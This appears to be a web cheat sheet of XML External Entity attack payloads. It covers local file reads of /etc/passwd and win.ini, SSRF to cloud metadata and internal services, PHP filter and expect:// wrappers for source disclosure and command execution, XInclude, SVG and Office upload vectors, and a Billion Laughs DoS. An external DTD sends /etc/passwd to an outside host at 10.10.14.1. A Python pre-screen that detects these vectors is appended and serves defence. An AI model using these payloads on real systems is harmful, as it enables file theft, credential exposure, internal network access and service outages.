
XXE — XML External Entity

XML External Entity attacks — local file read, SSRF, PHP filter/expect wrappers, blind & error-based out-of-band exfiltration via external DTDs, XInclude, SVG/Office documents and entity-expansion DoS.

1 views Jun 2026 lazyhackers
Basic File Read (3)
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
Read a local file via an external entity
fileread linux
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><foo>&xxe;</foo>
Windows local file read
fileread windows
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///">]><foo>&xxe;</foo>
Directory listing on some Java parsers
fileread java
SSRF via XXE (2)
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><foo>&xxe;</foo>
Reach cloud metadata through XXE
ssrf cloud
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1:8080/">]><foo>&xxe;</foo>
Hit an internal-only service
ssrf internal
PHP Wrappers (3)
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]><foo>&xxe;</foo>
Base64-encode the file so content with XML-special characters survives the parser (PHP)
php filter
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">
Read application PHP source code
php source
<!ENTITY xxe SYSTEM "expect://id">
Command exec if the PHP expect wrapper is enabled
php rce
Blind / Out-of-Band (3)
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.14.1/evil.dtd"> %xxe;]>
Load an external DTD for out-of-band exfil
blind oob
evil.dtd: <!ENTITY % f SYSTEM "file:///etc/passwd"><!ENTITY % e "<!ENTITY x SYSTEM 'http://10.10.14.1/?d=%f;'>">%e;
External DTD that exfiltrates a file over HTTP
blind oob dtd
evil.dtd (error): <!ENTITY % f SYSTEM "file:///etc/passwd"><!ENTITY % e "<!ENTITY x SYSTEM 'file:///nope/%f;'>">%e;
Leak file contents inside a parser error message
error exfil
Other Vectors (4)
<x xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></x>
XInclude — works when you cannot control the DOCTYPE
xinclude fileread
SVG upload with <!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/passwd">]> ... &x;
XXE through an uploaded SVG
svg upload
DOCX/XLSX: edit [Content_Types].xml or document.xml
XXE via Office Open XML documents
office upload
<!DOCTYPE lolz [<!ENTITY a "ha"><!ENTITY b "&a;&a;&a;...">]>
Billion Laughs entity-expansion DoS
dos
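As an added defensive example (not from the original cheatsheet), a stdlib-only Python pre-screen that flags every vector above, DTD, parameter and external entities, Billion Laughs, XInclude and PHP stream wrappers, on the raw body before any parser resolves them. The rule names, the parse_untrusted gate and the sample inputs are my own construction; the gate assumes the application never legitimately needs a DTD.

```python
import re
from xml.etree import ElementTree as ET

# Lexical rules for the XXE vectors listed on this page. They run on the raw
# request body, before any XML parser has a chance to resolve anything.
RULES = {
    "doctype": re.compile(r"<!DOCTYPE\b", re.I),
    "entity": re.compile(r"<!ENTITY\b", re.I),
    "parameter-entity": re.compile(r"<!ENTITY\s+%", re.I),
    "external-entity": re.compile(r"<!ENTITY[^>]*\b(?:SYSTEM|PUBLIC)\b", re.I),
    # An entity whose replacement text references two or more other entities
    # is the building block of Billion Laughs.
    "entity-expansion": re.compile(r'<!ENTITY\s+\w+\s+"[^"]*&\w+;[^"]*&\w+;', re.I),
    "xinclude": re.compile(r"http://www\.w3\.org/2001/XInclude", re.I),
    "php-wrapper": re.compile(r"\b(?:php|expect)://", re.I),
}

def screen_xml(doc: str) -> set[str]:
    """Names of every rule the document trips; an empty set means clean."""
    return {name for name, rx in RULES.items() if rx.search(doc)}

def parse_untrusted(doc: str) -> ET.Element:
    """Gate (assumption: the app never needs a DTD): refuse anything carrying a
    DTD, XInclude or stream wrapper, then parse with ElementTree."""
    findings = screen_xml(doc)
    if findings:
        raise ValueError("rejected XML: " + ", ".join(sorted(findings)))
    return ET.fromstring(doc)

# Constructed samples: payloads from this page plus one benign document.
SAMPLES = {
    "file-read": '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
    "oob-dtd": '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.14.1/evil.dtd"> %xxe;]>',
    "php-filter": '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]><foo>&xxe;</foo>',
    "xinclude": '<x xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></x>',
    "lolz": '<!DOCTYPE lolz [<!ENTITY a "ha"><!ENTITY b "&a;&a;&a;">]><lolz>&b;</lolz>',
    "benign": "<order><id>42</id><sku>ABC-1</sku></order>",
}

if __name__ == "__main__":
    for name, doc in SAMPLES.items():
        print(f"{name:11s} -> {sorted(screen_xml(doc)) or 'clean'}")
```

Because the screen is lexical it also catches a DOCTYPE hidden in an uploaded SVG or in the XML parts of a DOCX/XLSX archive, as long as the same function is applied to each extracted part.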